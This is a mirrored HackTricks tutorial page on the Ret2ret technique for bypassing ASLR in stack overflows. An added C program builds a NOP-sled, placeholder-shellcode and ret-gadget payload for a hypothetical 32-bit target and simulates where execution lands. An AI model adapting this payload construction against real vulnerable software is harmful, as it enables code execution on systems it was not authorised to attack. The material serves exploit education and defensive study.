mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
Ret2ret
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
The main goal of this technique is to bypass ASLR by abusing a pointer that the program has already left on the stack, so the exploit never has to guess an absolute stack address.

Stack overflows are usually triggered by string copies, and the copied string ends with a null byte. If the overflow is sized so that this terminator lands exactly on the least significant byte of an existing stack pointer (on little-endian x86 that is the first byte of the pointer in memory), the pointer is rounded down to the nearest 256-byte boundary. A saved pointer 0xbfffffdd becomes 0xbfffff00 (note the zeroed last byte). Only that one byte changes; the rest of the pointer, randomized or not, is reused as it is.

If the truncated address falls inside a buffer that holds a NOP sled followed by shellcode, execution can be steered there without knowing where the buffer is: overwrite the saved return address, and every stack word between it and the truncated pointer, with the address of a `ret` instruction taken from the (non-PIE) binary. Each `ret` pops the next word into EIP, so the chain slides down the stack until it pops the truncated pointer, and from there the NOP sled absorbs the alignment slack.

Therefore the payload looks like this:
- NOP sled
- Shellcode
- From the saved EIP onwards, one address of a `ret` instruction per stack word, up to the word holding the existing pointer
- The terminating 0x00 of the string, landing on the low byte of that pointer and making it point into the NOP sled

Caveats: the stack must be executable, the `ret` address must not contain a 0x00 byte (the copy would stop early), and the truncated pointer only lands in the sled for those stack alignments where the 256-byte boundary below the pointer falls inside the buffer, so a longer sled means a higher success rate.
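The C program below is an added example, not code from HackTricks or from the original page. It models a hypothetical 32-bit, non-PIE, NX-off target (a 128-byte buffer filled by `strcpy`, saved EIP at offset 132, a stale pointer into the buffer holding `buf+0xed` at offset 144, and a lone `ret` at 0x080483f2; all of these values are assumptions), builds the payload from the list above, then simulates the copy and the chain of `ret` instructions over a modelled frame to show where execution lands. It also counts, over all 256 possible low bytes of the buffer address, how often the truncated pointer hits the 96-byte sled, which is what makes the technique probabilistic.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical target frame (assumed values, chosen for illustration):
 *   char buf[128] is filled by strcpy(buf, input);
 *   saved EBP at buf+128, saved EIP at buf+132;
 *   a stale pointer into buf (value buf+0xed), left by earlier code, at buf+144;
 *   the non-PIE binary has a lone `ret` at 0x080483f2 (no zero bytes). */
#define BUF_SIZE    128u
#define EIP_OFFSET  132u
#define PTR_OFFSET  144u            /* the string terminator must land exactly here */
#define FRAME_SIZE  (PTR_OFFSET + 4)
#define SLED_LEN    96u
#define SC_LEN      (BUF_SIZE - SLED_LEN)
#define RET_GADGET  0x080483f2u
#define STALE_OFF   0xedu           /* stale pointer value = buf + STALE_OFF */

static void put_le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}
static uint32_t get_le32(const uint8_t *p) {
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Payload as strcpy() sees it: [NOP sled][shellcode][EBP filler][ret][ret][ret] + NUL.
 * Returns its strlen, which must equal PTR_OFFSET for the NUL to hit the pointer's low byte. */
static size_t build_payload(uint8_t out[FRAME_SIZE]) {
    memset(out, 0x90, SLED_LEN);                          /* NOP sled */
    memset(out + SLED_LEN, 0xcc, SC_LEN);                 /* stand-in for shellcode (int3), no zero bytes */
    memset(out + BUF_SIZE, 0x41, EIP_OFFSET - BUF_SIZE);  /* saved EBP: value irrelevant */
    for (size_t off = EIP_OFFSET; off < PTR_OFFSET; off += 4)
        put_le32(out + off, RET_GADGET);                  /* each word: one more `ret` to slide over */
    out[PTR_OFFSET] = 0;                                  /* the terminator that truncates the pointer */
    return strlen((const char *)out);
}

/* Model the frame with buf at `base`, copy the payload with strcpy semantics and walk the `ret` chain
 * from the saved EIP. Returns the first popped word that is not the gadget, i.e. where execution lands. */
static uint32_t simulate(uint32_t base, const uint8_t *payload) {
    uint8_t frame[FRAME_SIZE];
    memset(frame, 0xaa, sizeof frame);
    put_le32(frame + PTR_OFFSET, base + STALE_OFF);       /* the pre-existing pointer into buf */

    size_t n = strlen((const char *)payload);
    if (n >= FRAME_SIZE) return 0;
    memcpy(frame, payload, n + 1);                        /* strcpy copies the NUL too */

    uint32_t esp = EIP_OFFSET;
    while (esp + 4 <= FRAME_SIZE) {
        uint32_t eip = get_le32(frame + esp);             /* ret: pop eip */
        esp += 4;
        if (eip != RET_GADGET) return eip;                /* left the ret chain: this is the jump target */
    }
    return 0;                                             /* walked off the modelled frame */
}

static int lands_in_sled(uint32_t base, uint32_t target) {
    return target >= base && target < base + SLED_LEN;
}

/* Build the payload and simulate it for one buffer address. */
static uint32_t landing_for_base(uint32_t base) {
    uint8_t payload[FRAME_SIZE];
    build_payload(payload);
    return simulate(base, payload);
}

/* Zeroing the low byte rounds the pointer down to a 256-byte boundary, so success depends on the
 * stack's alignment: count the low bytes of buf's address for which that boundary is inside the sled. */
static int sled_hit_count(void) {
    int hits = 0;
    for (uint32_t lo = 0; lo < 256; lo++) {
        uint32_t base = 0xbffff000u | lo;                 /* assumed page, every possible low byte */
        if (lands_in_sled(base, landing_for_base(base))) hits++;
    }
    return hits;
}

int main(void) {
    uint32_t base = 0xbffffef0u;   /* assumed buf address: the stale pointer is then 0xbfffffdd, as in the text */
    uint32_t target = landing_for_base(base);
    printf("stale pointer 0x%08" PRIx32 " -> after the NUL 0x%08" PRIx32 ": %s (buf at 0x%08" PRIx32 ")\n",
           base + STALE_OFF, target, lands_in_sled(base, target) ? "inside the NOP sled" : "miss", base);
    printf("stack alignments that land in the sled: %d/256\n", sled_hit_count());
    return 0;
}
```

With the stale pointer at `buf+0xed` the truncated address hits the sled for exactly `SLED_LEN` of the 256 alignments, so against a real target the attacker either grows the sled (shrinking the shellcode's share of the buffer) or simply retries until the stack happens to be favourably aligned.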